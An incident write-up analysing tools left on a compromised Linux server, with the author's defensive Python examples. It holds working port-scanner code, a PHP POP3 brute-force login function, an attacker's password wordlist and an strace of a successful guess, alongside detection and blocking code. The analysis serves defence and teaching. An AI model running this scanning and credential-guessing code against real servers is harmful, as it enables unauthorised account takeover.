Analysis of a Linux Server Compromise

Source: Internet
Author: User
Tags: sesion

Introduction
Recently I dealt with a compromised server. Once broken into, the server had been turned into a bot that spent its time trying to crack accounts on other servers. Below we analyze the tools the attacker left behind, walk through the basic intrusion method they implement, and look at the corresponding preventive measures.
Tools left behind
After logging on to a compromised server, an attacker typically runs "w" to see who else is logged on, "passwd" to change the current user's password, and wget to fetch privilege-escalation and other attack tools. The tools are usually unpacked into a directory whose name starts with "." so that a plain ls does not show it. These are the "gifts" the attacker left on this server:

linux:/tmp/.ssh # ll
total 340
-rw-r--r-- 1 root   7289 06-03 13:06 pass_file
-rwxr-xr-x 1 root  17274 06-03 13:20 pscan
-rw-r--r-- 1 root   6071 06-03 13:10 pscan.c
-rwxr-xr-x 1 root 302240 06-03 13:06 screen
-rw-r--r-- 1 root   1444 06-03 13:06 sesion.php

Next we look at what each of these tools does.
Remote session management tool: screen
screen is used mainly for two things: managing several windows inside one login session, and detaching running processes from the remote connection that started them.
Multi-window management
Sometimes we need to run a long-running program, and the terminal is only usable again once it finishes. To do other work while it runs, we would normally have to open another remote login. screen avoids opening multiple logins. The following shows how screen simulates opening several windows.
Before starting screen, "who" on machine A shows two logins by user lx, one local (:0) and one remote:
linux:/tmp/.ssh> who
lx       :0
lx       pts/0        (192.168.1.102)
After starting screen from the remote session on pts/0, we get a new shell window, which appears as an additional login:
linux:/tmp/.ssh> who
lx       :0
lx       pts/0        (192.168.1.102)
lx       pts/1
Inside screen, Ctrl-a c creates a new window and Ctrl-a n / Ctrl-a p switch to the next / previous window. So while the long-running program is busy in one window, we can create or switch to another and keep working.
Detaching from the original remote connection
If a program is started from a remote terminal and the connection is closed before the program exits, the program normally receives SIGHUP and is terminated: a long-running job dies and unsaved edits are lost. With screen, the session can be detached and the remote connection closed while the processes inside it keep running. This is screen's main purpose, and it is exactly what an attacker needs when a cracking job must keep running after they log off.
In the screen window, run a program:

linux:/tmp/loop> ./endless_loop
Running...

While the program is running, close the remote login and open a terminal locally on the server. "who" now shows only the local session; the remote one is gone:

linux:/tmp/loop> who
lx       :0
lx       pts/0        (:0.0)

The endless_loop process started earlier from the remote session is still running, and following its parent chain upward shows that screen is its ancestor, now reparented to PID 1 because the login shell that started it is gone:

linux:/tmp/loop> ps -elf | grep endless | grep -v grep
0 R lx 4851 4586 99 80 0 - 926 - 00:00:32 pts/1 ./endless_loop
linux:/tmp/loop> ps -elf | grep 4586 | grep -v endless | grep -v grep
0 S lx 4586 4585 0 80 0 - 4193 wait 20:02 pts/1 00:00:00 /bin/bash
linux:/tmp/loop> ps -elf | grep 4585 | grep -v grep | grep -v 4586
1 S lx 4585 1 0 80 0 - 1036 - 20:02 ? 00:00:00 ./SCREEN
(original source: www.2cto.com)

For more information about screen, see its manual page (man screen).
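As an added example (not part of the original article or the attacker's toolkit), the following Python script turns the ps analysis above into a check an incident responder can run: it parses ps output and flags processes that run from a relative, temporary or hidden path, together with their descendants, and notes when such a process has been reparented to PID 1. The ps listing inside it is constructed to mirror the one above (using ps -eo pid,ppid,tty,args, which is easier to parse than ps -elf); the PIDs and paths in it are assumptions, not captured data.

```python
"""Flag processes that, like the attacker's ./SCREEN tree, run from a relative,
temporary or hidden path, or descend from such a process.

Added example, not code from the compromised host. SAMPLE_PS is constructed
to mirror the article's listing, in `ps -eo pid,ppid,tty,args` format.
"""
import re
from dataclasses import dataclass

# Constructed sample output of: ps -eo pid,ppid,tty,args
SAMPLE_PS = """\
  PID  PPID TT       ARGS
    1     0 ?        /sbin/init
  812     1 ?        /usr/sbin/sshd -D
 4301   812 ?        sshd: lx [priv]
 4402  4301 pts/0    -bash
 4585     1 ?        ./SCREEN
 4586  4585 pts/1    /bin/bash
 4851  4586 pts/1    ./endless_loop
 4902  4586 pts/1    /tmp/.ssh/pscan 192.168.1 22
"""

# Executables started via a relative path, from a temp directory, or from a
# hidden (dot) directory anywhere in their path deserve a second look.
SUSPICIOUS_PATH = re.compile(r"^(\./|/tmp/|/var/tmp/|/dev/shm/|.*/\.[^/]+/)")


@dataclass
class Proc:
    pid: int
    ppid: int
    tty: str
    args: str

    @property
    def exe(self) -> str:
        return self.args.split()[0]


def parse_ps(text: str) -> dict:
    """Parse `ps -eo pid,ppid,tty,args` output into {pid: Proc}."""
    procs = {}
    for line in text.strip().splitlines()[1:]:  # skip the header line
        pid, ppid, tty, args = line.split(None, 3)
        procs[int(pid)] = Proc(int(pid), int(ppid), tty, args)
    return procs


def ancestors(procs: dict, pid: int) -> list:
    """PID chain from pid up to init, e.g. [4851, 4586, 4585, 1]."""
    chain = []
    while pid in procs and pid not in chain:
        chain.append(pid)
        pid = procs[pid].ppid
    return chain


def find_suspects(procs: dict) -> dict:
    """Return {pid: reason} for suspicious processes and their descendants."""
    roots = {pid for pid, p in procs.items() if SUSPICIOUS_PATH.match(p.exe)}
    reasons = {}
    for pid, p in procs.items():
        if pid in roots:
            note = f"runs from {p.exe}"
            if p.ppid == 1:
                # Reparented to init: the session outlived the attacker's login
                # shell, which is exactly what screen is used for above.
                note += ", reparented to PID 1 (survives logout)"
            reasons[pid] = note
            continue
        for anc in ancestors(procs, p.ppid):
            if anc in roots:
                reasons[pid] = f"descendant of suspicious PID {anc} ({procs[anc].exe})"
                break
    return reasons


if __name__ == "__main__":
    for pid, why in sorted(find_suspects(parse_ps(SAMPLE_PS)).items()):
        print(f"{pid:>6}  {why}")
```

On a live host, feed it the real output (ps -eo pid,ppid,tty,args) instead of SAMPLE_PS, and remember that a rootkit or a deleted-after-exec binary can hide from ps; cross-check against /proc/PID/exe links and screen -ls for the users on the box.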

Brute-forcing accounts

Breaking into a server costs the attacker time and effort, so the machine is not left idle. Either information is harvested from it, or it is turned into a zombie ("meat machine") and used to crack accounts on yet more servers. Brute-forcing accounts requires a network service that authenticates users, such as pop3, ssh or telnet, and proceeds in two steps:
● Scan for hosts with the service's port open (for example, pop3 on port 110, ssh on port 22)
● Try username/password combinations against the hosts found open
Port Scanner
pscan is the port scanner and pscan.c is its source. The scanning logic is not complicated. First a socket descriptor is allocated for each target, switched to non-blocking mode, and its sockaddr_in structure is filled with the target IP address and port number:

    connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
    fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);   /* connect() must not block */
    connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
    connlist[i].addr.sin_family = AF_INET;
    connlist[i].addr.sin_port = htons(atoi(argv[2]));
Then call the connect function to try to establish a connection:
    ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr,
                  sizeof(struct sockaddr_in));
    if (ret == -1) {
        if (errno == EISCONN) {
            /* the non-blocking connect started earlier has completed: port open */
            fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr));
        } else if ((errno != EALREADY) && (errno != EINPROGRESS)) {
            /* any other error (typically ECONNREFUSED): peer port closed */
        }
        /* EALREADY / EINPROGRESS: still connecting, check again on the next pass */
    } else {
        /* connect() returned 0: port open */
        fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr));
    }
Because the socket is non-blocking, the first connect() call normally returns -1 with errno set to EINPROGRESS. pscan calls connect() again on a later pass, and the errno of that call tells how the attempt finished: EISCONN means the connection succeeded and the port is open, EALREADY or EINPROGRESS means it is still in flight, and anything else (usually ECONNREFUSED) means the port is closed. The IP address of every host whose port is open is written to the output file.
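The same non-blocking connect() logic in Python, as an added example that is not pscan.c: it generalises pscan slightly to take a list of (host, port) targets, waits for the connects to finish with the selectors module, and reads SO_ERROR to classify each target as open, closed or filtered. demo() starts its own listener on 127.0.0.1 so the scan runs offline; the port numbers it uses are whatever the kernel hands out. Do not point scan_targets at hosts you are not authorised to test.

```python
"""Non-blocking connect scan in the style of pscan (added example, not pscan.c).

Targets are (host, port) pairs, so the same function covers pscan's
one-port-many-hosts sweep and a many-ports-one-host probe.
"""
import errno
import selectors
import socket
import time


def scan_targets(targets, timeout=2.0):
    """Return {(host, port): 'open' | 'closed' | 'filtered'}.

    Same state machine as pscan: start a non-blocking connect() on every
    target at once, wait for the sockets to become writable, then read
    SO_ERROR to learn how each connect finished. (PHP's fsockopen() does the
    same thing, as the strace later in the article shows.)
    """
    sel = selectors.DefaultSelector()
    pending = {}
    result = {}
    for host, port in targets:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setblocking(False)
        rc = s.connect_ex((host, port))
        if rc == 0:                                        # finished immediately
            result[(host, port)] = "open"
            s.close()
        elif rc in (errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK):
            sel.register(s, selectors.EVENT_WRITE, (host, port))
            pending[(host, port)] = s
        else:                                              # e.g. ECONNREFUSED
            result[(host, port)] = "closed"
            s.close()

    deadline = time.monotonic() + timeout
    while pending:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            break
        for key, _ in sel.select(remaining):
            s, target = key.fileobj, key.data
            err = s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
            if err == 0:
                result[target] = "open"
            elif err == errno.ECONNREFUSED:
                result[target] = "closed"                  # RST came back
            else:
                result[target] = "filtered"                # ETIMEDOUT, EHOSTUNREACH, ...
            sel.unregister(s)
            s.close()
            del pending[target]

    for target, s in pending.items():                      # no answer before timeout
        result[target] = "filtered"
        sel.unregister(s)
        s.close()
    sel.close()
    return result


def demo():
    """Scan one open and one closed loopback port; returns (result, open_port, closed_port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))        # borrow a free port number, then release it
    closed_port = probe.getsockname()[1]
    probe.close()
    try:
        result = scan_targets([("127.0.0.1", open_port), ("127.0.0.1", closed_port)])
    finally:
        listener.close()
    return result, open_port, closed_port


if __name__ == "__main__":
    result, _, _ = demo()
    for (host, port), state in sorted(result.items()):
        print(f"{host}:{port} {state}")
```

The third state, filtered, is what pscan lumps together with "closed": a firewall that silently drops the SYN produces no error at all, only a timeout, and distinguishing the two is the first thing a defender looks for in scan logs.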

Password cracking

Once the IP addresses with the port open have been recorded, the attacker connects to each of them again and tries a large number of username/password combinations against the service's authentication. sesion.php, listed at the beginning of the article, is the PHP script used to crack pop3 accounts; each line of pass_file holds one username and password pair.
Different services (pop3, telnet, ssh and so on) authenticate differently, so the cracking code is service-specific. POP3 is one of the simplest to attack, because its login is just a USER command followed by a PASS command, each answered with +OK or -ERR:

function POPa($username, $password, $server) {
    $socket = fsockopen($server, 110);              // POP3 port
    if (!$socket) {
        return "cracked";                           // could not connect
    }
    $res = fgets($socket, 512);                     // read the banner, expect +OK
    if (substr(trim($res), 0, 3) != "+OK") {
        return "cracked";                           // not a POP3 greeting
    }
    fputs($socket, "USER $username\r\n");           // send user
    $res = fgets($socket, 512);                     // expect +OK
    if (substr(trim($res), 0, 3) != "+OK") {
        return "cracked";
    }
    fputs($socket, "PASS $password\r\n");           // send pass
    $res = fgets($socket, 512);                     // expect +OK
    if (substr(trim($res), 0, 3) != "+OK") {
        return $res;                                // -ERR: wrong password, return the error
    }
    $fp = fopen("vuln.txt", "a");                   // append the hit to vuln.txt
    fwrite($fp, "$server $username $password\r\n");
    fclose($fp);
}

fsockopen() first connects to the target; the script then sends the username and the password. If the reply to PASS starts with "+OK", authentication succeeded and the pair is a valid account on that pop3 server, so the script appends the server, username and password to vuln.txt. Only the first three characters of each reply are checked, which is all the protocol guarantees: the text after "+OK" or "-ERR" is free-form and differs between servers.
Running the cracking script under strace shows the exchange between the two machines in detail. Note that fsockopen() also performs a non-blocking connect followed by poll() and a getsockopt(SO_ERROR) check, the same technique the port scanner uses:

socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(110), sin_addr=inet_addr("213.8.54.xx")}, 16) = -1 EINPROGRESS (Operation now in progress)
poll([{fd=3, events=POLLIN|POLLOUT|POLLERR|POLLHUP}], 1, 60000) = 1 ([{fd=3, revents=POLLOUT}])
getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
fcntl(3, F_SETFL, O_RDWR) = 0
poll([{fd=3, events=POLLIN|POLLERR|POLLHUP}], 1, 60000) = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, "+OK Microsoft Exchange Server 20"..., 8192, MSG_DONTWAIT, NULL, NULL) = 99
sendto(3, "USER dennis\r\n", 13, MSG_DONTWAIT, NULL, 0) = 13
poll([{fd=3, events=POLLIN|POLLERR|POLLHUP}], 1, 60000) = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, "+OK\r\n", 8192, MSG_DONTWAIT, NULL, NULL) = 5
sendto(3, "PASS dennis\r\n", 13, MSG_DONTWAIT, NULL, 0) = 13
poll([{fd=3, events=POLLIN|POLLERR|POLLHUP}], 1, 60000) = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, "+OK User successfully logged on."..., 8192, MSG_DONTWAIT, NULL, NULL) = 34
sendto(3, "QUIT\r\n", 6, MSG_DONTWAIT, NULL, 0) = 6
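The POP3 exchange from both sides, as an added example that is neither sesion.php nor the target server's code. A minimal constructed POP3 responder runs in a thread over a socketpair, and the client half performs the same banner/USER/PASS/QUIT sequence as POPa(), checking each reply for +OK. The account store VALID and the SAMPLE_PASS_FILE wordlist are made up for the demo; bare wordlist lines are assumed to mean the password equals the username, which is how the dennis/dennis attempt in the strace fits the pass_file excerpt shown later in the article.

```python
"""POP3 USER/PASS exchange, client and server, as an added example.

Neither half is sesion.php or a real server. The exchange runs offline over a
socketpair so the transcript can be inspected; VALID and SAMPLE_PASS_FILE are
constructed for the demo.
"""
import socket
import threading

VALID = {"dennis": "dennis", "info": "test12345"}   # constructed server accounts

SAMPLE_PASS_FILE = """\
dennis
administrator 123456
qwerty
info test12345
sales
"""


def parse_pass_file(text):
    """Yield (username, password); a bare username is assumed to mean password == username."""
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        yield parts[0], (parts[1] if len(parts) > 1 else parts[0])


def pop3_server(conn, valid):
    """Minimal POP3 AUTHORIZATION state: answers USER, PASS and QUIT."""
    f = conn.makefile("rwb")
    f.write(b"+OK POP3 server ready\r\n")
    f.flush()
    user = None
    while True:
        line = f.readline()
        if not line:
            break
        cmd, _, arg = line.decode(errors="replace").rstrip("\r\n").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
            reply = b"+OK\r\n"        # accept any name: do not leak which users exist
        elif cmd == "PASS":
            ok = user is not None and valid.get(user) == arg
            reply = b"+OK User successfully logged on.\r\n" if ok else b"-ERR authentication failed\r\n"
            user = None
        elif cmd == "QUIT":
            f.write(b"+OK bye\r\n")
            f.flush()
            break
        else:
            reply = b"-ERR unknown command\r\n"
        f.write(reply)
        f.flush()
    f.close()
    conn.close()


def pop3_try_login(sock, username, password):
    """One attempt with POPa()'s steps: banner, USER, PASS, each checked for +OK."""
    f = sock.makefile("rwb")
    transcript = []

    def send(cmd):
        transcript.append("C: " + cmd)
        f.write((cmd + "\r\n").encode())
        f.flush()

    def expect_ok():
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        transcript.append("S: " + line)
        return line.startswith("+OK")   # only the status token is protocol-defined

    ok = False
    if expect_ok():                      # greeting
        send(f"USER {username}")
        if expect_ok():
            send(f"PASS {password}")
            ok = expect_ok()
    send("QUIT")
    expect_ok()
    f.close()
    sock.close()
    return ok, transcript


def run_wordlist(pass_file_text, valid):
    """Try each credential against a fresh in-process server; hits are what vuln.txt would hold."""
    hits, transcripts = [], []
    for username, password in parse_pass_file(pass_file_text):
        client_end, server_end = socket.socketpair()
        t = threading.Thread(target=pop3_server, args=(server_end, valid))
        t.start()
        ok, transcript = pop3_try_login(client_end, username, password)
        t.join()
        transcripts.append(transcript)
        if ok:
            hits.append((username, password))
    return hits, transcripts


if __name__ == "__main__":
    hits, transcripts = run_wordlist(SAMPLE_PASS_FILE, VALID)
    for line in transcripts[0]:
        print(line)
    print("hits:", hits)
```

Two things the exchange makes visible: every guess costs the attacker a full new TCP connection (as the PHP does), so connection-rate limiting on port 110 bites directly, and a server that answered -ERR to USER for unknown names would let the attacker drop non-existent accounts from the list before spending any PASS attempts on them.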

Lessons

No server on a network can avoid being probed. What can be done in advance to make an intrusion harder?
Set strong passwords
A look at pass_file shows which usernames and passwords the attacker tries:
......
michelle
nobody
administrator 123456
qwerty
backup
info test12345
shop
sales
The list consists of account names used as their own password (michelle, nobody, backup, shop, sales) plus a handful of trivial passwords such as "123456" and "test12345". A password must never equal the username and must not be one of these common strings.

Open only the ports you need

Attackers get in through the ports a server exposes, so port management must be strict. Services such as telnet are rarely needed and insecure; on most servers they should be disabled. Services such as ftp can be started when required and stopped again as soon as they are no longer in use.

Use a tool to block attackers

Against the brute-force attacks described above, where one source tries thousands of logins with different accounts, a natural countermeasure is to cap the number of failed authentication attempts per source address and reject further connections from any address that exceeds the cap.
Tools exist that implement this. DenyHosts, for example, parses the sshd log, and when it finds repeated failed logins from one address it adds that address to /etc/hosts.deny so that TCP wrappers refuse its further ssh connections. Two caveats: /etc/hosts.deny is only consulted by an sshd built with TCP wrappers (libwrap) support, which upstream OpenSSH dropped in version 6.7, so on many current systems a firewall-based tool such as fail2ban is used instead; and a blocklist only slows the guessing down, it does not fix a weak password, so combine it with key-based authentication and disable password logins where possible.
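The core of what DenyHosts automates, as an added example written for this article rather than DenyHosts' own code: count failed sshd logins per source address within a sliding window and emit hosts.deny entries for addresses that cross the threshold. The log lines are constructed in the syslog format sshd writes to /var/log/auth.log or /var/log/secure, using RFC 5737 documentation addresses; the threshold (5) and window (10 minutes) are assumptions.

```python
"""Count failed sshd logins per source address in a sliding window and emit
hosts.deny entries. Added example, not DenyHosts' own code; the log lines
below are constructed in sshd's syslog format with documentation addresses.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SAMPLE_AUTH_LOG = """\
Jun  3 13:00:00 srv sshd[2101]: Failed password for invalid user test from 198.51.100.9 port 44010 ssh2
Jun  3 13:07:00 srv sshd[2102]: Failed password for root from 198.51.100.9 port 44011 ssh2
Jun  3 13:14:00 srv sshd[2103]: Failed password for invalid user admin from 198.51.100.9 port 44012 ssh2
Jun  3 13:20:01 srv sshd[2314]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Jun  3 13:20:03 srv sshd[2316]: Failed password for root from 203.0.113.7 port 51130 ssh2
Jun  3 13:20:05 srv sshd[2318]: Failed password for invalid user backup from 203.0.113.7 port 51134 ssh2
Jun  3 13:20:08 srv sshd[2320]: Failed password for invalid user sales from 203.0.113.7 port 51140 ssh2
Jun  3 13:20:09 srv sshd[2322]: Accepted publickey for lx from 192.168.1.102 port 40122 ssh2
Jun  3 13:20:11 srv sshd[2324]: Failed password for root from 203.0.113.7 port 51147 ssh2
Jun  3 13:21:00 srv sshd[2104]: Failed password for invalid user shop from 198.51.100.9 port 44013 ssh2
Jun  3 13:28:00 srv sshd[2105]: Failed password for root from 198.51.100.9 port 44014 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed password|Accepted \w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_auth_log(lines, year=2024):
    """Yield {time, ip, user, failed} for each sshd authentication line."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                     # other sshd messages, other daemons
        # syslog timestamps carry no year; assume one so the times are comparable
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield {"time": ts, "ip": m["ip"], "user": m["user"],
               "failed": m["result"] == "Failed password"}


def offenders(lines, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: time_blocked} for sources with >= threshold failures inside window."""
    recent = defaultdict(deque)
    blocked = {}
    for rec in parse_auth_log(lines):
        if not rec["failed"]:
            continue
        q = recent[rec["ip"]]
        q.append(rec["time"])
        while q and rec["time"] - q[0] > window:
            q.popleft()                  # forget failures that fell out of the window
        if len(q) >= threshold and rec["ip"] not in blocked:
            blocked[rec["ip"]] = rec["time"]
    return blocked


def hosts_deny_lines(blocked):
    """TCP-wrappers entries for /etc/hosts.deny (honoured only by an sshd built with libwrap)."""
    return [f"sshd: {ip}" for ip in sorted(blocked)]


if __name__ == "__main__":
    for entry in hosts_deny_lines(offenders(SAMPLE_AUTH_LOG.splitlines())):
        print(entry)
```

In the sample, 203.0.113.7 makes five failed attempts in ten seconds and is blocked, while 198.51.100.9 also fails five times but spreads them seven minutes apart, so no ten-minute window ever holds more than two and it is never blocked. That is the trade-off every such tool has: a slow, patient attacker stays under the threshold, which is why the blocklist complements strong passwords and key-only authentication rather than replacing them.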

Summary

This article covered the use of screen, how a port scanner is implemented and the basic method of brute-forcing accounts, and closed with several measures that defend against brute-force attacks.
A server turned into a zombie scans and cracks accounts across whole network ranges around the clock, so the probability of being attacked is high. Take the preventive measures and do not treat the risk lightly.
 
